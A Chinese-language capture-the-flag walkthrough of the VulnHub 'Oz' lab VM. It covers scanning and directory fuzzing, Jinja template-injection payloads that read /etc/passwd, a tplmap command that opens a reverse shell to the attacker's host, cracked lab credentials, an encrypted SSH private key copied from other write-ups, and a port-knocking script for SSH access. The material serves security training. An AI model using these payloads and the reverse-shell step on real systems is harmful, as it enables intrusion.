本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机环境：https://www.vulnhub.com/entry/oz-1,317/

1. 信息收集

nmap -sV -sC -T5 -p- 192.168.5.128

扫描结果：

kali@kali:~$ nmap -sV -sC -T5 -p- 192.168.5.128

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-06 21:49 EDT

Nmap scan report for 192.168.5.128

Host is up (0.00087s latency).

Not shown: 65533 filtered ports

PORT    STATE SERVICE VERSION

80/tcp  open  http    Werkzeug httpd 0.14.1 (Python 2.7.14)

|_http-title: OZ webapi

|_http-trane-info: Problem with XML parsing of /evox/about

8080/tcp open  http    Werkzeug httpd 0.14.1 (Python 2.7.14)

| http-open-proxy: Potentially OPEN proxy.

|_Methods supported:CONNECTION

|_http-server-header: Werkzeug/0.14.1 Python/2.7.14

| http-title: GBR Support - Login

|_Requested resource was http://192.168.5.128:8080/login

|_http-trane-info: Problem with XML parsing of /evox/about

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 73.76 seconds

发现开放了两个端口分别为：80，8080

根据nmap扫描的信息可以知道，开放的端口是Python2.7版本写的Werkzeug，用这个关键字在github搜了下，发现有个利用的exp，可以命令执行

https://github.com/Fare9/PyWerkzeug-Debug-Command-Execution/

这个有对于的metasploit的payload

上述测试发现不行，目标调试模式没有开启

尝试使用dirsearch暴力猜解目录,这个下载下来直接使用python3执行即可，下面是github地址

https://github.com/maurosoria/dirsearch

对目标开始爆破的命令

python3 dirsearch.py -u http://192.168.5.128 -e *

扫描的全是返回的200响应码，访问几个测试一下，实际是不存在的，但是目标会干扰你的思路，因为访问的时候会显示一个随机的字符串

那么看看目标网站还有什么被允许的请求

使用curl命令进行测试

kali@kali:~$ curl -i -X OPTIONS http://192.168.5.128

HTTP/1.0 200 OK

Content-Type: text/html; charset=utf-8

Allow: HEAD, OPTIONS, GET

Content-Length: 0

Server: Werkzeug/0.14.1 Python/2.7.14

Date: Fri, 07 Aug 2020 10:17:04 GMT

发现了一个特点，那就是返回的200响应码显示的结果中的Content-Length为0，那么我们可以使用这个特点来测试，这里就直接使用wfuzz命令来进行模糊测试

wfuzz -u http://192.168.5.128/FUZZ/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hl 0

wfuzz的使用方式：https://blog.csdn.net/hardhard123/article/details/79596104

sqlmap -u "http://192.168.5.128/users" --dbs --batch  这里我使用的靶机并没有测试成功能够注入，下面两步操作是根据网上的记录拿下来的，大家有疑问可以自己去尝试，目的重点是学习这其中的方法和思路，靶机是为了训练实战，加深印象

注入成之后能获取对应的账号和加密的密码

通过使用john进行破解密码

john --format=pbkdf2-hmac-sha256 --wordlist=/usr/share/wordlist/rockyou.txt ozhases.txt

破解出来获取的如下密码

wizard.oz：wizardofoz22

上述也可使用hashcat进行破解

因为这里无法通过sql注入，所以无法获得目标用户的私钥，这里就直接从网上的拿过来

-----BEGIN RSA PRIVATE KEY-----

Proc-Type: 4,ENCRYPTED

DEK-Info: AES-128-CBC,66B9F39F33BA0788CD27207BF8F2D0F6

RV903H6V6lhKxl8dhocaEtL4Uzkyj1fqyVj3eySqkAFkkXms2H+4lfb35UZb3WFCnb6P7zYZDAnRLQjJEc/sQVXuwEzfWMa7pYF9Kv6ijIZmSDOMAPjaCjnjnX5kJMK3Fne1BrQdh0phWAhhUmbYvt2z8DD/OGKhxlC7oT/49I/ME+tm5eyLGbK69Ouxb5PBtynh9A+Tn70giENR/ExO8qY4WNQQMtiCM0tszes8+guOEKCckMivmR2qWHTCs+N7wbzna//JhOG+GdqvEhJp15pQuj/3SC9O5xyLe2mqL1TUK3WrFpQyv8lXartH1vKTnybdn9+Wme/gVTfwSZWgMeGQjRXWe3KUsgGZNFK75wYtA/F/DB7QZFwfO2Lb0mL7Xyzx6nZakulY4bFpBtXsuBJYPNy7wB5ZveRSB2f8dznu2mvarByMoCN/XgVVZujugNbEcjnevroLGNe/+ISkJWV443KyTcJ2iIRAa+BzHhrBx31kG//nix0vXoHzB8Vj3fqh+2MnEycVvDxLK8CIMzHc3cRVUMBeQ2X4GuLPGRKlUeSrmYz/sH75AR3zh6Zvlva15Yavn5vR48cdShFS3FC6aH6SQWVe9K3oHzYhwlfT+wVPfaeZrSlCH0hG1z9C1B9BxMLQrnDHejp9bbLppJ39pe1U+DBjzDo4s6rk+Ci/5dpieoeXrmGTqElDQi+KEU9g8CJptonbYAGUxPFIpPrN2+1RBbxY6YVaop5eyqtnF4ZGpJCoCW2r8BRsCvuILvrO1O0gXF+nwtsktmylmHvHApoXrW/GThjdVkdD9U/6Rmvv3s/OhtlAp3Wqw6RI+KfCPGiCzh1Vn0yfXH70CfLO2NcWtO/JUJvYH3M+rvDDHZSLqgW841ykzdrQXnR7s9Nj2EmoW72IHnznNPmB1LQtD45NH6OIG8+QWNAdQHcgZepwPz4/9pe2tEqu7Mg/cLUBsTYb4a6mftnicOX9OAOrcZ8RGcIdVWtzU4q2YKZex4lyzeC/k4TAbofZ0E4kUsaIbFV/7OMedMCnzCTJ6rlAl2d8e8dsSfF96QWevnD50yx+wbJ/izZonHmU/2ac4c8LPYq6Q9KLmlnunvI9bLfOJh8DLFuqCVI8GzROjIdxdlzk9yp4LxcAnm1Ox9MEIqmOVwAd3bEmYckKwnw/EmArNIrnr54Q7a1PMdCsZcejCjnvmQFZ3ko5CoFCC+kUe1j92i081kOAhmXqV3nc6xgh8Vg2qOyzoZm5wRZZF2nTXnnCQ3OYR3NMsUBTVG2tlgfp1NgdwIyxTWn09V0nnOzqNtJ7OBt0/RewTsFgoNVrCQbQ8VvZFckvG8sV3U9bh9Zl28/2I3B472iQRo+5nuoRHpAgfOSOERtxuMpkrkU3IzSPsVS9c3LgKhiTS5wTbTw7O/vxxNOoLpoxO2Wzbn/4XnEBh6VgLrjThQcGKigkWJaKyBHOhEtuZqDv2MFSE6zdX/N+L/FRIv1oVR9VYvnQGpqEaGSUG+/TSdcANQdD3mv6EGYI+o4rZKEHJKUlCI+I48jHbvQCLWaR/bkjZJunXtSuV0TJXto6abznSC1BFlACIqBmHdeaIXWqH+NlXOCGE8jQGM8s/fd/j5g1Adw3

-----END RSA PRIVATE KEY-----

有了私钥，但是目标只开放了80和8080端口，那先放着

开始访问8080端口

使用burpsuite进行抓包查看

POST / HTTP/1.1

Host: 192.168.5.128:8080

Content-Length: 30

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://192.168.5.128:8080

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://192.168.5.128:8080/

Accept-Encoding: gzip, deflate

Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7

Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IndpemFyZC5veiIsImV4cCI6MTU5Njc5OTA4Mn0.hRecZ0MV_2HusS947TIhqpUrn6ZS99CD4FQhrY2i8_s

Connection: close

name={{8*'8'}}&desc=dsfsdfasdf

HTTP/1.0 302 FOUND

Content-Type: text/html; charset=utf-8

Content-Length: 31

Location: http://192.168.5.128:8080/

Server: Werkzeug/0.14.1 Python/2.7.14

Date: Fri, 07 Aug 2020 11:11:35 GMT

Name: 88888888 desc: dsfsdfasdf

POST / HTTP/1.1

Host: 192.168.5.128:8080

Content-Length: 82

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://192.168.5.128:8080

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://192.168.5.128:8080/

Accept-Encoding: gzip, deflate

Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7

Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IndpemFyZC5veiIsImV4cCI6MTU5Njc5OTA4Mn0.hRecZ0MV_2HusS947TIhqpUrn6ZS99CD4FQhrY2i8_s

Connection: close

name={{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}&desc=2

使用tplmap进行 ssti注入

https://github.com/epinna/tplmap

python tplmap.py -u 'http://192.168.5.128:8080' -X POST -d 'name=*&desc=anything' -c 'token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IndpemFyZC5veiIsImV4cCI6MTU5NjgwMjkxMH0.GU5jNRig6m1UPOl97Avigh01FAV74vN9lTzeUpFsexY' --reverse-shell 192.168.5.129 4488

我这里测试的靶机同样并没有成功

/.secret # cat knockd.conf

[options]

    logfile = /var/log/knockd.log

[opencloseSSH]

    sequence    = 40809:udp,50212:udp,46969:udp

    seq_timeout    = 15

    start_command    = ufw allow from %IP% to any port 22

    cmd_timeout    = 10

    stop_command    = ufw delete allow from %IP% to any port 22

    tcpflags    = syn

    大概意思就是在15秒内，安装顺序联系udp端口40809，50212，46969，之后的10秒钟之内是可以连接目标的22端口

上述操作完成之后发现有knock，那么可以通过如下脚本进行操作

#!/bin/bash

ports="40809 50212 46969"

for port in $ports; do

    echo "[*] Knocking on ${port}"

    echo "a" | nc -u -w 1 192.168.5.128 ${port}

    sleep 0.1

done;

echo "[*] Knocking done."

echo "[*] Password:"

echo "N0Pl4c3L1keH0me"

ssh -i /home/kali/Downloads/id_rsa dorthi@192.168.5.128

也有另一种方法

https://github.com/grongor/knock

./knock 192.168.5.128 -u 40809 50212 46969 && ssh -i id_rsa dorthi@192.168.5.128

参考：

https://www.anquanke.com/post/id/170362

https://www.twblogs.net/a/5c433dcabd9eee35b3a6f4d2/?lang=zh-cn